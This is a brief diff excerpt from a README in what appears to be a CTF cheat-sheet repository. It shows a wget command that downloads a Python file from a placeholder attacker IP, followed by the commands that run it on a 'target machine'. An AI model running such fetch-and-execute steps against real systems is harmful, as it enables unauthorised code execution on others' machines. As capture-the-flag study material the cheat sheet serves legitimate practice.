cozuxhub/Cheat-Sheet-For-CTF-s/README.md

 ```
 wget http://[Your IP Address]/[document.py]
 ```
-> Let's run this python file on our target machine.
+> If we can, let's run this python file on our target machine.
 ```
 python document.py
 /usr/bin/python document.py